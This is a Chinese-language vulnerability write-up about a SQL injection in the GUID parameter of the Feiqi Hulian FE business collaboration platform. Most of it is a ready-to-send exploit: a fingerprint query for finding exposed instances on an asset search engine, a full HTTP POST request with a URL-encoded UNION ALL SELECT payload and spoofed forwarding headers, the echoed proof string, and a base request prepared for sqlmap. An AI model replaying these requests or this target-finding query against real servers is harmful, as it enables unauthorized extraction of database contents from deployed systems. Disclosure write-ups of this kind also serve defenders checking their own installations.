登录 白背景
源码

飞企互联FE业务协作平台GUID存在SQL注入漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台GUID存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 飞企互联FE业务协作平台

三、资产测绘

  • hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
  • 登录页面

image.png

四、漏洞复现

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

option=2&GUID=1%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2884%29%2BCHAR%2865%29%2BCHAR%28102%29%2BCHAR%28107%29%2BCHAR%28108%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%2865%29%2BCHAR%2869%29%2BCHAR%2872%29%2BCHAR%28100%29%2BCHAR%28103%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%2884%29%2BCHAR%28105%29%2BCHAR%2865%29%2BCHAR%2870%29%2BCHAR%28115%29%2BCHAR%2868%29%2BCHAR%2886%29%2BCHAR%2880%29%2BCHAR%28114%29%2BCHAR%2882%29%2BCHAR%28103%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28115%29%2BCHAR%28101%29%2BCHAR%2887%29%2BCHAR%2888%29%2BCHAR%2889%29%2BCHAR%28116%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28108%29%2BCHAR%2884%29%2BCHAR%28116%29%2BCHAR%2881%29%2BCHAR%2870%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29--+GDzH

image.png
回显

qzbjqTAfklpvAEHdgXqTiAFsDVPrRgilseWXYtwblTtQFqqpqq

sqlmap

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

option=2&GUID=1

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/eg2niw9hl6iwbu6p